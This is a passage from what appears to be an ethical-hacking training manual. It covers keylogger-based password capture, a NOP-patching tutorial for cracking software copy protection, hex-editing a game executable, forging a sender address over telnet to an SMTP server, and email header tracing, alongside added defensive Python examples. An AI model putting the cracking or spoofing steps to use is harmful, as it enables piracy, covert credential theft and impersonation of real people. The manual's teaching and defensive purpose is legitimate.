Block all outbound e-mail attachments that aren’t protected on your e-mail server.
Use an encryption program, such as PGP, to create self-extracting encrypted
files.
Use content-filtering applications.
5.13 Other ways to crack passwords_______________
Over the years, I’ve found other ways to crack passwords, both technically and through
social engineering.
5.13.1 Keystroke logging
One of the best techniques for cracking passwords is remote keystroke
logging — the use of software or hardware to record keystrokes as they're being typed
into the computer.
Be careful with keystroke logging. Even with good intentions, monitoring employees can
raise some legal issues. Discuss what you’ll be doing with your legal counsel, and get
approval from upper management.
5.13.2 Logging tools
With keystroke-logging tools, you can later assess the log files of your application to see
what passwords people are using:
Keystroke-logging applications can be installed on the monitored computer. It is
recommended that you check out eBlaster and Spector Pro by SpectorSoft
(www.spectorsoft.com).
Another popular tool that you can use is Invisible Key Logger Stealth, at
www.amecisco.com/iks.htm, as well as the hardware-based Key Ghost
(www.keyghost.com). Dozens of other such tools are available on the Internet.
Hardware-based tools fit between the keyboard and the computer or replace the
keyboard altogether.
A shared computer can capture the passwords of every user who logs in.
Figure: 5.13
5.13.3 Countermeasures
The best defense against the installation of keystroke-logging software on your systems
is a spyware-detection program or popular antivirus products.
The potential for hackers to install keystroke-logging software is another reason to
ensure that your users aren’t downloading and installing random shareware or opening
attachments in unsolicited e-mails. Consider locking down your desktops by setting the
appropriate user rights through local or group security policy in Windows. Alternatively,
you could use a commercial lock-down program, such as Fortres 101 (www.fortres.com)
for Windows or Deep Freeze (www.deepfreezeusa.com) for Windows and Mac OS X.
5.13.3.1 Weak password storage
Many legacy and stand-alone applications such as e-mail, dial-up network connections,
and accounting software store passwords locally, making them vulnerable to password
hacking. By performing a basic text search, I’ve found passwords stored in clear text on
the local hard drives of machines.
5.13.3.2 Searching
You can try using your favorite text-searching utility — such as the Windows search
function, findstr, or grep — to search for password or passwd on your drives. You may
be shocked to find what’s on your systems. Some programs even write passwords to
disk or leave them stored in memory. This is a hacker’s dream. Head it off if you can.
5.13.3.3 Countermeasures
The only reliable way to eliminate weak password storage is to use only applications
that store passwords securely. This may not be practical, but it’s your only guarantee
that your passwords are secure.
5.14 Good password practice_____________________
Password policies often include advice on proper password management such as:
Never sharing a computer account.
Never using the same password for more than one account.
Never telling a password to anyone, including people who claim to be from
customer service or security.
Never writing down a password.
Never communicating a password by telephone, e-mail or instant messaging.
Being careful to log off before leaving a computer unattended.
Changing passwords whenever there is suspicion they may have been
compromised.
Keeping Windows passwords and application passwords different.
Using alphanumeric passwords.
Chapter-6
Reverse Engineering & Cracking
Techniques
Session Objectives:
At the end of this Session, you will be able to understand –
Reverse Engineering
Reverse Engineering and Other Types of Engineering
Stages Involved In the Reverse Engineering Process
Disassembly or Decompilation
Source Code and Object Code
Uses of Reverse Engineering
Reverse Engineering
How to Crack Any Type of Software Protection
Tool: Hex Workshop
6.1 Introduction_________________________________
Reverse engineering is the general process of analyzing a technology specifically to
ascertain how it was designed or how it operates. This kind of inquiry engages
individuals in a constructive learning process about the operation of systems and
products. Reverse engineering as a method is not confined to any particular purpose,
but is often an important part of the scientific method and technological development.
The process of taking something apart and revealing the way in which it works is often
an effective way to learn how to build a technology or make improvements to it.
Through reverse engineering, a researcher gathers the technical data necessary for the
documentation of the operation of a technology or component of a system. In "black
box" reverse engineering, systems are observed without examining internal structure,
while in "white box" reverse engineering the inner workings of the system are inspected.
When reverse engineering software, researchers are able to examine the strength of
systems and identify their weaknesses in terms of performance, security, and
interoperability. The reverse engineering process allows researchers to understand both
how a program works and also what aspects of the program contribute to its not
working. Independent manufacturers can participate in a competitive market that
rewards the improvements made on dominant products. For example, security audits,
which allow users of software to better protect their systems and networks by revealing
security flaws, require reverse engineering. The creation of better designs and the
interoperability of existing products often begin with reverse engineering.
6.2 Reverse Engineering and other types of
Engineering
The most traditional method of the development of a technology is referred to as
"forward engineering." In the construction of a technology, manufacturers develop a
product by implementing engineering concepts and abstractions. By contrast, reverse
engineering begins with final product, and works backward to recreate the engineering
concepts by analyzing the design of the system and the interrelationships of its
components.
Value engineering refers to the creation of a system or product that is improved relative
to the one originally analyzed. While there is often overlap between the methods of value
engineering and reverse engineering, the goal of reverse engineering itself is the
improved documentation of how the original product works by uncovering the underlying
design. The working product that results from a reverse engineering effort is more like a
duplicate of the original system, without necessarily adding modifications or
improvements to the original design.
6.3 Stages involved in the Reverse Engineering
Process
Since the reverse engineering process can be time-consuming and expensive, reverse
engineers generally consider whether the financial risk of such an endeavor is
preferable to purchasing or licensing the information from the original manufacturer, if
possible.
In order to reverse engineer a product or component of a system, engineers and
researchers generally follow a four-stage process:
1. Identifying the product or component which will be reverse engineered
2. Observing or disassembling the information documenting how the original
product works
3. Implementing the technical data generated by reverse engineering in a replica or
modified version of the original
4. Creating a new product (and, perhaps, introducing it into the market)
In the first stage in the process, sometimes called "prescreening," reverse engineers
determine the candidate product for their project. Potential candidates for such a project
include singular items, parts, components, units, subassemblies, some of which may
contain many smaller parts sold as a single entity.
The second stage, disassembly or decompilation of the original product, is the most
time-consuming aspect of the project. In this stage, reverse engineers attempt to
construct a characterization of the system by accumulating all of the technical data and
instructions of how the product works.
In the third stage of reverse engineering, reverse engineers try to verify that the data
generated by disassembly or decompilation is an accurate reconstruction of the original
system. Engineers verify the accuracy and validity of their designs by testing the
system, creating prototypes, and experimenting with the results.
The final stage of the reverse engineering process is the introduction of a new product
into the marketplace. These new products are often innovations of the original product
with competitive designs, features, or capabilities. These products may also be
adaptations of the original product for use with other integrated systems, such as
different platforms of computer operating systems.
Often different groups of engineers perform each step separately, using only documents
to exchange the information learned at each step. This is done to prevent direct
duplication of the original technology, which may violate copyright; reverse engineering
done this way creates a different implementation with the same functionality.
6.4 Disassembly or Decompilation_________________
In the development of software, the source code in which programmers originally write is
translated into object (binary) code. The translation is done with a computer program
called an "assembler" or "compiler," depending on the source code's language, such as
Java, C++, or assembly. A great deal of the original programmer's instructions, including
commentary, notations, and specifications, are not included in the translation from
source to object code (the assembly or compilation).
Disassembly or decompilation reverses this process by reading the object code of the
program and translating it into source code. By presenting the information in a
computer language that a software programmer can understand, the reverse engineer
can analyze the structure of the program and identify how it operates.
The data generated in the disassembly of a typical computer program is one or more
files with thousands of lines of computer code. Because much of the original
programmer's commentary, notations, and specifications are not retained in the object
code, the reverse engineered code constitutes only a part of the program information
included in the original source code. Engineers must interpret the resulting source code
using knowledge and expertise to recreate the data structures of the original program
and understand the overall design rationale of the system.
Not all reverse engineering efforts require "decompilation" of software. Some "black box"
reverse engineering is done by characterizing software through observation of its
interaction with system components, other software, and other (external) systems
through networks.
6.5 Source Code and Object Code__________________
Source code is the category of computer language instructions that is most frequently
written and read by software programmers. A computer cannot generally run a program
in source code form though. The source code is translated, with the use of an assembler
or compiler, into a language form that contains instructions to the computer known as
object code. Object code consists of numeric codes specifying each of the computer
instructions that must be executed, as well as the locations in memory of the data on
which the instructions are to operate.
While source code and object code are commonly referred to as different classes of
computer language, these terms actually describe the series of transformations a
program goes through when being converted from a higher level language more easily
comprehensible to humans to the lower level language of computer operations.
6.6 Uses of Reverse Engineering
A common misperception regarding reverse engineering is that it is used for the sake of
stealing or copying someone else's work. Reverse engineering is not only used to figure
out how something works, but also the ways in which it does not work.
Some examples of the different uses of reverse engineering include:
1. Understanding how a product works more comprehensively than by merely
observing it
2. Investigating and correcting errors and limitations in existing programs
3. Studying the design principles of a product as part of an education in engineering
4. Making products and systems compatible so they can work together or share
data
5. Evaluating one's own product to understand its limitations
6. Determining whether someone else has literally copied elements of one's own
technology
7. Creating documentation for the operation of a product whose manufacturer is
unresponsive to customer service requests
8. Transforming obsolete products into useful ones by adapting them to new
systems and platforms
6.7 Reverse Engineering__________________________
6.7.1 HOW TO CRACK ANY TYPE OF SOFTWARE
PROTECTION
In this tutorial you will learn how to crack any type of software protection using
W32Dasm and HIEW.
6.7.1.1 IDENTIFYING THE PROTECTION:
Run the program, game, etc. (SoftwareX) that you want to crack without the CD in the
CD reader. SoftwareX will not run, of course; however, when the error window pops up it
will give you all of the vital information that you need to crack the program, so be sure to
write down what it says.
6.7.1.2 CRACKING THE PROTECTION:
Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO
DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear
(e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.
When W32Dasm finishes disassembling the file it will display unrecognizable text; this is
what we want. Click on the String Data References button. Scroll through the String
Data Items until you find SoftwareX’s error message. When you locate it, double click
the error message and then close the window to return to the Win32Dasm text. You will
notice that you have been moved somewhere within SoftwareX's check routine; this
is where the error message is generated.
Now comes the difficult part, so be careful. To crack SoftwareX's protection you must
know the @offset of every call and jump command. Write down every call and
jump @offset number that you see (make sure that the OPBAR has changed its
color to green). You need the number after the @offset without the "h".
Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a
popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to
see a list of numbers. Now press the F5 key and enter the number that was extracted
using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s
check routine within HIEW.
To continue you must understand this paragraph. If the command that you are taken to
is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits
equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes. If you understood this then you
can continue.
Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the
digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90).
After you complete this step press the F10 key to exit.
Congratulations! You just cracked SoftwareX!
Don't panic if SoftwareX will not run after you have finished. It only means that
something was done incorrectly, or perhaps SoftwareX's protection technology has
been improved or created after this tutorial was written. Simply reinstall SoftwareX and
start over. If you're sure that you completed all steps correctly and the program still will
not run, then tough nuts: their protection was developed after the writing of this tutorial.
6.7.2 TOOL: HEX WORKSHOP
Hex Workshop, the Professional Hex Editor, is a file and disk editor which runs on
Windows 3.1, Windows 95, and Windows NT. Hex Workshop was designed by
programmers for programmers and does not double as a text editor. Both the 16 bit and
32 bit version are available for only $20.
With Hex Workshop you can:
1. Edit multiple files of unlimited size.
2. Edit Floppy and Hard Disks on Windows 3.1, 95, and NT.
3. Hex Edit files directly from the File Manager or Windows 95 Desktop.
4. Cut, Copy, Paste, Insert, Delete, and Undo.
5. Find and Replace Hex or ASCII values.
6. Goto from the start, end, or cursor position within a file or disk.
7. Use the Compare Tool to find differences in files.
8. Calculate Checksums for all or part of a file.
9. Search across multiple sectors on a Disk.
10. Print high quality hex dumps.
11. Get File/Disk properties with the click of the mouse.
12. View File/Disk attributes in the Status Bar.
13. Use Keycuts to access most features with function keys.
14. Use online help including an ASCII table and list of data types.
15. And you get two additional applets:
1. A Base Converter to convert between hex/decimal/binary.
2. A Hex/Decimal Calculator (supporting +, -, *, /, &, ^, >>, <<, ~).
Let's take a game and apply reverse engineering to it.
Open margames.exe; after exiting the game you will get the following window.
Figure 6.1
Before editing, take a backup of margames.exe, because while editing there is a good
chance of the file being corrupted.
Now open margames.exe in the Hex Workshop editor, find the string "klik & play",
replace it with the name "ANUP GIRDHAR" and save the file.
Figure 6.2
Let's play the game again; after exiting we will get the following window.
Figure 6.3
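Both walkthroughs above come down to overwriting bytes in an executable, and the W32Dasm/HIEW tutorial relies on the fact that the E9 instruction is exactly 5 bytes. The following added example (not part of the manual, W32Dasm, HIEW or Hex Workshop) decodes an x86 JMP rel32 instruction, applies the same five NOP bytes to a constructed code image, and shows that a byte-level comparison and a SHA-256 digest both reveal the edit, which is the check a loader or installer can run against a known-good build. The image contents, the load address 0x401000 and the function names are assumptions.

```python
import hashlib
import struct

# The 5-byte instruction quoted in the tutorial and the NOP bytes that are
# written over it.
ORIGINAL_JMP = bytes.fromhex("E92BF9BF74")
NOP_PATCH = b"\x90" * len(ORIGINAL_JMP)

# Constructed stand-in for a code section (not a real executable): INT3 filler,
# the JMP at offset 0x10, then a string like the one edited in Hex Workshop.
JMP_OFFSET = 0x10
IMAGE_BASE = 0x00401000   # assumed address of the first byte of the section
ORIGINAL_IMAGE = b"\xCC" * JMP_OFFSET + ORIGINAL_JMP + b"\x00" * 3 + b"klik & play\x00"


def decode_jmp_rel32(code: bytes, address: int) -> dict:
    """Decode an x86 'JMP rel32' (opcode E9) that starts at `address`.

    The instruction is always 5 bytes: one opcode byte plus a little-endian
    signed 32-bit displacement measured from the end of the instruction
    (address + 5). That is why the tutorial counts 10 hex digits as 5 bytes.
    """
    if len(code) < 5 or code[0] != 0xE9:
        raise ValueError("not a JMP rel32 instruction")
    rel32 = struct.unpack_from("<i", code, 1)[0]
    target = (address + 5 + rel32) & 0xFFFFFFFF
    return {"length": 5, "rel32": rel32, "target": target}


def apply_bytes(image: bytes, offset: int, replacement: bytes) -> bytes:
    """Overwrite bytes at `offset`, as a hex editor in overwrite mode does."""
    if offset + len(replacement) > len(image):
        raise ValueError("patch runs past the end of the image")
    return image[:offset] + replacement + image[offset + len(replacement):]


def diff_images(original: bytes, modified: bytes) -> list:
    """(offset, original_byte, modified_byte) for every byte that differs."""
    if len(original) != len(modified):
        raise ValueError("images differ in length")
    return [(i, a, b) for i, (a, b) in enumerate(zip(original, modified)) if a != b]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def integrity_ok(image: bytes, expected_sha256: str) -> bool:
    """Compare against a known-good digest: any single-byte edit changes it."""
    return sha256_hex(image) == expected_sha256


if __name__ == "__main__":
    d = decode_jmp_rel32(ORIGINAL_JMP, IMAGE_BASE + JMP_OFFSET)
    print(f"JMP rel32 {d['rel32']:#x} -> target {d['target']:#010x} ({d['length']} bytes)")
    known_good = sha256_hex(ORIGINAL_IMAGE)
    patched = apply_bytes(ORIGINAL_IMAGE, JMP_OFFSET, NOP_PATCH)
    for off, before, after in diff_images(ORIGINAL_IMAGE, patched):
        print(f"offset {off:#06x}: {before:02X} -> {after:02X}")
    print("integrity check on patched image:", integrity_ok(patched, known_good))
```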
Chapter-7
E-Mail Hacking & Countermeasures
Session Objectives:
At the end of this Session, you will be able to understand –
Sending E-Mail via Telnet
E-Mail Tracing Case
Converting an IP Address into a Name
Converting a Domain Address
Tools for Email Tracing
Introduction____________________________________
Email hacking is one of the biggest requests throughout the world, from ethical and
non-ethical hackers alike, and there are many sites that assure you that they can hack
your email IDs.
There are many concepts, tools, strategies, scripts and techniques by which it is
possible to retrieve an email password.
Let us discuss the biggest loophole in our email system, i.e. SMTP (Simple Mail
Transfer Protocol) via port 25.
Whether we are receiving or sending mail, it is taken care of by the SMTP protocol,
generally via port 25; if we can receive normal mail this way, then why not forged mail?
Here we demonstrate this using the Telnet software, approaching one of the websites,
i.e. www.anupgirdhar.net. Once we scan the ports we find that port 25 is open, so let's try
to send mail using the email ID of "Bill Gates" [email protected] to Mr. Anup Girdhar at his
email ID, i.e. [email protected]
7.1 Sending e-mail via Telnet______________________
Just as with a POP3 connection, when you click on the 'Send' button, your e-mail client contacts the SMTP server of your mail service / ISP. It then uses a set of commands to transmit your e-mail. What we are going to do is try these commands ourselves, and get first-hand experience of how things work. SMTP servers usually have a DNS name of the form smtp.<your_isp>.com or mail.<web_mail_address>.com. Some samples are: mail.monitortools.com, mail.adminfavorites.com.
In this document, we:
# Shall use Telnet to connect to the SMTP server.
# Shall give commands to the server, then type our e-mail, and finally tell the server, 'Okay, the e-mail is done. Send it.'
# Can then send more mails, or disconnect from the server.
The steps are quite similar to what you do when you send an e-mail from, for instance, Outlook Express. We are going to use the SMTP server of monitortools.com with the ID 'webmaster'.
Step-1
Connect to the Internet in case you are a dial-up user. Open an MS-DOS prompt, and
enter this command:
C:\>telnet www.anupgirdhar.net 25
This will open a Telnet window, and within a short time, you will be connected to the
SMTP server, and the server says:
Figure: 7.1
This varies, but you should definitely see the '220' part. It is an indication that the server
is ready to service your request.
Step-2
Now the server expects you to identify yourself. If you are a dial-up user, you can enter the name of your computer (the one Windows asks you for when you install Windows) or anything else you want. If you have a domain name, then you should enter the domain name here; in this demonstration we skip the computer name and intentionally leave it blank:
helo
! Note that it is 'helo' and not 'hello'. The commands are not case-sensitive, so you can also say
HeLo or HELO or hELo. The server replies:
Figure: 7.2
This is like a shake-hand. You tell the server your name, and it says its name!
Computers are quite friendly, you see!
Step-3
Next give any e-mail address.
mail from: [email protected]
'mail from:' is an SMTP command.
! Note that there is a space between 'mail' and 'from', followed by a colon (:). The server says:
Figure: 7.3
Step-4
Tell the server who you want to send the e-mail to.
! Note that most SMTP servers require that your e-mail address belong to the same domain as the server. For example, if you send mail from the Yahoo! SMTP server, you should have a Yahoo! address. You cannot use it if you give it a Hotmail address. Let me give the SMTP server an e-mail address and send a mail to:
rcpt to: [email protected]
Figure: 7.4
Step-5
You have told the server your e-mail address and the recipient's e-mail address, so now you can go ahead and type the e-mail, including its header, in which you may put any date, time etc. You have to do that with the data command:
data
The server asks you to go ahead with your e-mail:
Figure: 7.5
Don't worry about what it shows; it'll be explained later.
Step-6
Now type in your e-mail, like this:
Figure: 7.6
CTRL-h. If it works, well and good.
.
When you finish your e-mail, press [ENTER], then a '.', and again an [ENTER]. This tells
the server that you have finished the e-mail, and it can send it. It will say:
250 Ok: queued as 6AB5150038
Your mail was sent!
Step-7
Now you can either send another mail, or disconnect from the server. If you want to
send another mail, you should repeat the 'rcpt to:' and 'data' commands. There is no
need for 'helo' and 'mail from:', because the server already knows who you are. If you
want to disconnect, just say 'quit':
quit
The server will reply:
221 Connection to Host lost.
and you will lose connection with the server. Hurray, you sent a mail direct from the
server! Try this in front of your friends who may be used to only GUIs and icons. They
will begin to call you up for technical support!
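The dialogue of Steps 1 to 7 seen from the server's side, as an added example that is not part of the manual: a small Python model of an SMTP command handler that answers with the 220/250/354/221 codes shown above and applies the rule noted in Step 4, refusing a 'mail from:' address outside its own domain with a 550 reply instead of relaying the forged mail. The domain example.invalid and every address in it are constructed placeholders.

```python
import re

# Constructed placeholder for the server's own domain (not a real host).
LOCAL_DOMAIN = "example.invalid"

# Accepts 'user@host' or '<user@host>'; group 1 is the address, group 2 its domain.
ADDR_RE = re.compile(r"<?([^<>\s]+@([^<>\s]+))>?")


class SmtpSession:
    """Server side of one Telnet/SMTP session, fed one client line at a time."""

    def __init__(self, local_domain=LOCAL_DOMAIN):
        self.local_domain = local_domain.lower()
        self.helo = None        # name given with HELO (may be empty, as in Step 2)
        self.sender = None      # accepted 'mail from:' address
        self.rcpts = []         # 'rcpt to:' addresses of the current message
        self.body = []          # lines collected after DATA
        self.in_data = False
        self.queued = []        # (sender, recipients, body) per accepted message
        self.closed = False

    def greeting(self):
        """The '220' banner the manual says you must see first."""
        return f"220 {self.local_domain} ESMTP ready"

    def feed(self, line):
        """Handle one client line; return the reply, or None while reading the body."""
        if self.in_data:
            return self._data_line(line)
        verb, _, arg = line.strip().partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb in ("HELO", "EHLO"):        # case-insensitive, as the manual notes
            self.helo = arg
            return f"250 {self.local_domain}"
        if verb == "MAIL" and arg[:5].upper() == "FROM:":
            return self._mail_from(arg[5:].strip())
        if verb == "RCPT" and arg[:3].upper() == "TO:":
            return self._rcpt_to(arg[3:].strip())
        if verb == "DATA":
            if not self.rcpts:
                return "503 Need RCPT TO first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            self.closed = True
            return "221 Bye"
        return "500 Command not recognized"

    def _mail_from(self, rest):
        m = ADDR_RE.fullmatch(rest)
        if not m:
            return "501 Syntax error in MAIL FROM"
        address, domain = m.group(1), m.group(2).lower()
        # The rule from Step 4: the sender must belong to this server's domain.
        # A forged 'mail from:' for some other domain is refused, not relayed.
        if domain != self.local_domain:
            return f"550 Sender address rejected: not in domain {self.local_domain}"
        self.sender = address
        return "250 Ok"

    def _rcpt_to(self, rest):
        if self.sender is None:
            return "503 Need MAIL FROM first"
        m = ADDR_RE.fullmatch(rest)
        if not m:
            return "501 Syntax error in RCPT TO"
        self.rcpts.append(m.group(1))
        return "250 Ok"

    def _data_line(self, line):
        if line == ".":                     # lone dot ends the message (Step 6)
            self.in_data = False
            self.queued.append((self.sender, list(self.rcpts), "\n".join(self.body)))
            # Step 7: the next mail repeats only 'rcpt to:' and 'data', so the
            # sender is kept while the recipient list and body are cleared.
            self.rcpts, self.body = [], []
            return f"250 Ok: queued as {len(self.queued):08X}"
        # A body line beginning with '.' is sent as '..' (dot-stuffing); undo it.
        self.body.append(line[1:] if line.startswith("..") else line)
        return None


def run_dialogue(lines, local_domain=LOCAL_DOMAIN):
    """Feed a whole client transcript; return the session and every reply in order."""
    session = SmtpSession(local_domain)
    replies = [session.greeting()]
    for line in lines:
        reply = session.feed(line)
        if reply is not None:
            replies.append(reply)
    return session, replies


if __name__ == "__main__":
    # Constructed transcript mirroring Steps 2-7, trying the forged sender first.
    script = ["helo", "mail from: billg@elsewhere.invalid",
              "mail from: webmaster@example.invalid", "rcpt to: anyone@somewhere.invalid",
              "data", "Subject: test", "", "hello", ".", "quit"]
    print("\n".join(run_dialogue(script)[1]))
```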
7.2 E-mail Tracing case___________________________
# Every email has a so-called header. The header is the part in which the route the email has taken is described.
# The header is normally hidden by the email programme. Every email programme can display it, though (look into the "Options" or "Preferences" menu).
Figure: 7.7
7.2.1 Header Protocol
# When an e-mail message is sent, the user typically controls only the recipient line(s) (To:, Cc: and Bcc:) and the Subject: line.
# Mail software adds the rest of the header information as it is processed.
# Along the e-mail's route a server can add or delete lines (e.g. an anonymous re-mailer).
7.2.1.1 Sample header
1. Return-Path: <[email protected]>
2. Received: from mailhub-1.net.treas.gov ([10.7.14.10]) by nccmail.usss.treas.gov
for <[email protected]>;Fri, 18 Feb 2000 11:46:07 -0500
3. Received: from mx-relay.treas.gov ([199.196.144.6]) by tias4.net.treas.gov
via smtpid (for mailhub.net.treas.gov [10.7.8.10]) with SMTP; 18 Feb 2000 16:55:44
4. Received: from hotmail.com (f7.law4.hotmail.com [216.33.149.7]) by mx-relay2.treas.gov
for <[email protected]>; Fri, 18 Feb 2000 11:55:44 -0500 (EST)
5. Message-ID: <[email protected]>
6. Received: from 199.196.144.42 by www.hotmail.com with HTTP; Fri, 18 Feb 2000 08:55:43
7. X-Originating-IP: [199.196.144.42]
8. From: "Secret" <[email protected]>
9. To: [email protected]
10. CC: [email protected]
1. Return-Path
Line (1) tells other computers who really sent the message, and where to send error messages (bounces
and warnings).
2. Received: from mailhub-1.net.treas.gov ([10.7.14.10]) by nccmail.usss.treas.gov for <[email protected]>; Fri, 18 Feb 2000 11:46:07 -0500
3. Received: from mx-relay.treas.gov ([199.196.144.6]) by tias4.net.treas.gov via smtpd (for mailhub.net.treas.gov [10.7.8.10]) with SMTP; 18 Feb 2000 16:55:44
4. Received: from hotmail.com (f7.law4.hotmail.com [216.33.149.7]) by mx-relay2.treas.gov for <[email protected]>; Fri, 18 Feb 2000 11:55:44 -0500 (EST)
# Lines (2), (3) and (4) show the route the message took from sending to delivery.
# Each computer that receives this message adds a Received: field with its complete address and time stamp; this helps in tracking delivery problems.
5. Message-ID: <[email protected]>
# Line (5) is the Message-ID, a unique identifier for this specific message. This ID is logged, and can be traced through computers on the message route if there is a need to track the mail.
We want to trace this number.
6. Received: from 199.196.144.42 by www.hotmail.com with HTTP; Fri, 18 Feb 2000 08:55:43
# Line (6) shows where the email was first received from, with the IP address of the sender.
# It also shows the date and time when the message was sent.
7. X-Originating-IP: [199.196.144.42]
# Line (7) shows the originating IP address of the sender, but without the date and time the IP address will not allow you to identify the specific user.
# If the IP address is a "static" address you WILL be able to identify the specific user (most IP addresses are "dynamically" assigned).
We want to trace this domain name.
8. From: "Secret" <[email protected]>
# Line (8) tells the name and e-mail address of the message originator (the "sender").
9. To: [email protected]
Line (9) shows the name and e-mail address of the primary recipient; the address may be for a
– mailing list ([email protected])
– system-wide alias ([email protected])
– a personal username
10. CC: [email protected]
Line (10) lists the names and e-mail addresses of the "carbon copy" recipients of the message. There may be "Bcc:" recipients as well; these "blind carbon copy" recipients get copies of the message, but their names and addresses are not visible in the headers.
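The header walk-through above done programmatically, as an added example (not the manual's own code): it unfolds the header lines, reads the Received: fields bottom-up to get the chronological route, picks the originating IP, and flags a chain whose X-Originating-IP disagrees with the first hop or whose hops do not hand off within the same domain. The sample header is constructed from the relay names, IP addresses and timestamps listed in 7.2.1.1; the mailbox names and the Message-ID are placeholders because the page does not show them.

```python
import re

# Constructed sample modelled on the header walked through in 7.2.1.1: the relay
# names, IP addresses and timestamps are the ones the manual lists; mailbox
# names and the Message-ID are placeholders because the page does not show them.
SAMPLE_HEADER = """\
Return-Path: <sender@example.invalid>
Received: from mailhub-1.net.treas.gov ([10.7.14.10]) by nccmail.usss.treas.gov
 for <recipient@example.invalid>; Fri, 18 Feb 2000 11:46:07 -0500
Received: from mx-relay.treas.gov ([199.196.144.6]) by tias4.net.treas.gov
 via smtpd (for mailhub.net.treas.gov [10.7.8.10]) with SMTP; 18 Feb 2000 16:55:44
Received: from hotmail.com (f7.law4.hotmail.com [216.33.149.7]) by mx-relay2.treas.gov
 for <recipient@example.invalid>; Fri, 18 Feb 2000 11:55:44 -0500 (EST)
Message-ID: <placeholder-message-id@hotmail.com>
Received: from 199.196.144.42 by www.hotmail.com with HTTP; Fri, 18 Feb 2000 08:55:43
X-Originating-IP: [199.196.144.42]
From: "Secret" <sender@example.invalid>
To: recipient@example.invalid
CC: copy@example.invalid
"""

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def unfold_headers(raw):
    """Return (name, value) pairs. A line starting with whitespace continues
    the previous field; the first blank line ends the header block."""
    fields = []
    for line in raw.splitlines():
        if not line.strip():
            break
        if line[0] in " \t" and fields:
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        else:
            name, _, value = line.partition(":")
            fields.append((name.strip(), value.strip()))
    return fields

def parse_received(value):
    """Extract the 'from' host, its IP, the 'by' host and the timestamp (the
    text after the last ';') from one Received: value."""
    clauses, sep, date = value.rpartition(";")
    if not sep:
        clauses, date = value, ""
    hop = {"from": None, "ip": None, "by": None, "date": date.strip() or None}
    m = re.search(r"\bfrom\s+(\S+)(.*?)(?=\s+by\s+|$)", clauses)
    if m:
        hop["from"] = m.group(1)
        ip = IPV4_RE.search(m.group(1) + " " + m.group(2))
        hop["ip"] = ip.group(1) if ip else None
    m = re.search(r"\bby\s+(\S+)", clauses)
    if m:
        hop["by"] = m.group(1)
    return hop

def trace_route(fields):
    """Each relay prepends its own Received: line, so reading them bottom-up
    gives the chronological path: origin first, final delivery last."""
    received = [v for n, v in fields if n.lower() == "received"]
    return [parse_received(v) for v in reversed(received)]

def origin_ip(fields):
    """X-Originating-IP when present, otherwise the IP of the earliest hop."""
    for n, v in fields:
        if n.lower() == "x-originating-ip":
            m = IPV4_RE.search(v)
            if m:
                return m.group(1)
    hops = trace_route(fields)
    return hops[0]["ip"] if hops else None

def registrable(host):
    """Last two DNS labels: enough to match www.hotmail.com with f7.law4.hotmail.com."""
    return ".".join(host.lower().strip("[]").split(".")[-2:])

def consistency_warnings(fields):
    """Signs that the chain was edited or spoofed: X-Originating-IP disagreeing
    with the first hop, or a hop claiming a different domain than the one the
    previous relay said it handed the message to."""
    hops = trace_route(fields)
    warnings = []
    first_ip = hops[0]["ip"] if hops else None
    xo = origin_ip(fields)
    if first_ip and xo != first_ip:
        warnings.append(f"X-Originating-IP {xo} differs from first hop {first_ip}")
    for i in range(1, len(hops)):
        prev_by, cur_from = hops[i - 1]["by"], hops[i]["from"]
        if prev_by and cur_from and registrable(prev_by) != registrable(cur_from):
            warnings.append(f"hop {i}: from {cur_from}, but previous relay was {prev_by}")
    return warnings


if __name__ == "__main__":
    fields = unfold_headers(SAMPLE_HEADER)
    for i, hop in enumerate(trace_route(fields)):
        print(f"{i}: {hop['from']} [{hop['ip']}] -> {hop['by']} @ {hop['date']}")
    print("origin:", origin_ip(fields), "| warnings:", consistency_warnings(fields))
```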
7.3 Converting an ip address into a name___________
Figure: 7.8
7.4 Converting a Domain Address_________________
Figure: 7.9
Figure: 7.10
Figure: 7.11
7.4.1 Domain addressing
# Similar in principle to a postal address.
# Example: for Jim Smith in the sales office of the company ABC in Australia, the address may be: [email protected]
# This indicates that within the domain AU (the internationally standardized code for the country Australia) there is a subdomain ABC.AU, and within the subdomain ABC.AU there is a further subdomain SALES.ABC.AU.
7.4.2 The outermost domain
# Usually a two-character country code (internationally).
# Most e-mail addresses end in one of the following three-character codes:
COM  Commercial companies
EDU  Schools and universities
GOV  Government agencies
INT  International organizations
MIL  Military organizations
NET  Network providers and gateways
ORG  Not-for-profit organizations
7.5 Tools for E-mail Tracing_______________________
7.5.1 Ping (Packet InterNet Groper)
# Ping is a protocol and program for sending a signal to see whether another network host or other device is online and responding. The term is normally used as a verb, as in "Ping [host] to see if it is up!"
# Ping sends an ICMP (Internet Control Message Protocol) Echo packet to a specified host, and waits for a response. It reports success or failure and statistics about its operation. Ping is useful for testing and debugging networks.
# It's also useful for determining the IP (Internet Protocol) address from a domain name. To determine the domain name from an IP address you must use nslookup.
Ping (Windows help file)
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] destination-list
Options:
    -t             Ping the specified host until stopped.
                   To see statistics and continue - type Control-Break;
                   To stop - type Control-C.
    -a             Resolve addresses to hostnames.
    -n count       Number of echo requests to send. [count range is 1 to 4294967295]
    -l size        Send buffer size. [size range is from 0 to 65500]
    -f             Set Don't Fragment flag in packet.
    -i TTL         Time To Live. [TTL range is from 1 to 255]
    -v TOS         Type Of Service.
    -r count       Record route for count hops. [count range is 0 to 9]
    -s count       Timestamp for count hops. [count range is 1 to 4]
    -j host-list   Loose source route along host-list.
    -k host-list   Strict source route along host-list.
    -w timeout     Timeout in milliseconds to wait for each reply.
